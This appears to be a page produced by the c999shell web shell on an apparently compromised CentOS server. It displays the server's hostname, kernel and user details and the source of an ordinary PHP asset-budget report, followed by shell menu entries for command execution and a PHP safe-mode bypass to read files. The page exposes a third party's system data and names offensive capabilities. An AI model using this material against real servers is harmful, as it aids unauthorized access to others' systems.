Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/ws_standard_on_mis/ drwxr-xr-x |
Viewing file: Select action/file-type: <?php $information = '<?xml version="1.0" encoding="windows-874"?>'; //asset_permanent $information .= "\n<asset_permanent>"; //asset_permanent $information .= "\n<assets>"; $dsn_name = "asset"; $username =""; $password =""; $connect= odbc_connect($dsn_name, $username, $password) or die("µÔ´µèÍ DSN äÁèä´é"); //selece_database_asset $sql = "SELECT TBase_budget.id as a, TBase.name, TBase.bye_year, TBase.pirce, TBase_budget.budgetyear ,TBase_budget.amount , TBase.TTypecate_id , TTypeCatagory.id FROM TBase, TBase_budget, TTypeCatagory WHERE (TBase.id = TBase_budget.id) and (TBase.TTypecate_id = TTypeCatagory.id) and ( (TBase.TTypecate_id = '100') or (TBase.TTypecate_id = '101') )and (TBase_budget.budgetyear = 2550)"; $execute = odbc_exec($connect, $sql) or die ("àÍç¡«Ô¤ÔÇÊì¤ÓÊÑè§äÁèä´é $sql"); $i=1; $num1=0; while($row = odbc_fetch_array($execute)) { $TBase_id=$row['a']; $TBase_name=$row["name"]; $TBase_bye_year=$row["bye_year"]; $TBase_pirce=$row["pirce"]; $TBase_amont1=$row["amount"]; //$TBase_amont1=$row["budget2"]; //$TProject_budget3=$row["budget3"]; //$TProject_budget4=$row["budget4"]; //selece_database_TTypeProject // $sql2 = "SELECT * FROM TTypeProject WHERE (id='$TProject_Type_id')"; // $execute2 = odbc_exec($connect, $sql2) or die ("àÍç¡«Ô¤ÔÇÊì¤ÓÊÑè§äÁèä´é"); // while($row2 = odbc_fetch_array($execute2)) // { // $TTypeProject_id=$row2["id"]; // $TTypeProject_name=$row2["name"]; // } //selece_database_TTypeProjectSub // $sql3 = "SELECT * FROM TTypeProjectSub WHERE (id='$TProject_TypeSub_id')"; //$sql = "SELECT * FROM TProject"; // $execute3 = odbc_exec($connect, $sql3) or die ("àÍç¡«Ô¤ÔÇÊì¤ÓÊÑè§äÁèä´é"); // while($row3 = odbc_fetch_array($execute3)) // { // $TTypeProjectSub_id=$row3["id"]; // $TTypeProjectSub_name=$row3["name"]; // } $num1++; $information .= "\n<asset>"; $information .= "\n<asset_id>"; $information .= "$TBase_id"; $information .= "\n</asset_id>"; $information .= "\n<asset_name>"; $information .= "$TBase_name"; $information .= "\n</asset_name>"; $information .= "\n<asset_bye_year>"; $information .= "$TBase_bye_year"; $information .= "\n</asset_bye_year>"; $information .= "\n<asset_pirce>"; $information .= "$TBase_pirce"; $information .= "\n</asset_pirce>"; $information .= "\n<amount1>"; $information .= "$TBase_amount1"; $information .= "\n</amount1>"; $information .= "\n</asset>"; //$TBase_amont1_sum=$TProject_budget2_sum+$TProject_budget2; //$TProject_budget3_sum=$TProject_budget3_sum+$TProject_budget3; //$TProject_budget4_sum=$TProject_budget4_sum+$TProject_budget4; } //end_selece_database_project $information .= "\n</assets>"; //sum_Project_budget $information .= "\n<amount1_sum>"; $information .= "$TBase_amount1_sum"; $information .= "\n</amount1_sum>"; $information .= "\n<amount2_sum>"; $information .= "$TBase_amount2_sum"; $information .= "\n</amount2_sum>"; $information .= "\n<amount3_sum>"; $information .= "$TBase_amount3_sum"; $information .= "\n</amount3_sum>"; $information .= "\n</asset_permanent>"; // xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx //echo "$information"; // xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx echo "<table>"; echo "<tr>"; echo "<td>No.</td>"; echo "<td>TBase_id</td>"; echo "<td>TBase_name</td>"; echo "<td>TBase_bye_year</td>"; echo "<td>TBase_pirce</td>"; echo "<td>TBase_amount1</td>"; echo "<td>TBase.TTypecate_id</td>"; echo "</tr>"; $x=1; $sum100 = ""; $sum101 = ""; $execute2 = odbc_exec($connect, $sql) or die ("àÍç¡«Ô¤ÔÇÊì¤ÓÊÑè§äÁèä´é $sql"); while($row2 = odbc_fetch_array($execute2)) { $TBase_id=$row2['a']; $TBase_name=$row2["name"]; $TBase_bye_year=$row2["bye_year"]; $TBase_pirce=$row2["pirce"]; $TBase_amont1=$row2["amount"]; $TTypecate_id=$row2["TTypecate_id"]; echo "<tr>"; echo "<td>".$x."</td>"; echo "<td>".$TBase_id."</td>"; echo "<td>".$TBase_name."</td>"; echo "<td>".$TBase_bye_year."</td>"; echo "<td>".$TBase_pirce."</td>"; echo "<td>".$TBase_amont1."</td>"; echo "<td>".$TTypecate_id."</td>"; echo "</tr>"; $x++; if ($TTypecate_id == '100') { $sum100 = $sum100 + $TBase_amont1; } if ($TTypecate_id == '101') { $sum101 = $sum101 + $TBase_amont1; } } echo "</table>"; echo "<br>"; echo " â¤Ã§ÊÃéÒ§¾×é¹°Ò¹ = ".$sum100."<br>"; echo "ÍÒ¤Òà = ".$sum101."<br>"; // xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx ?> |
:: Command execute :: | |
:: Shadow's tricks :D :: | |
Useful Commands
|
:: Preddy's tricks :D :: | |
Php Safe-Mode Bypass (Read Files)
|
--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0054 ]-- |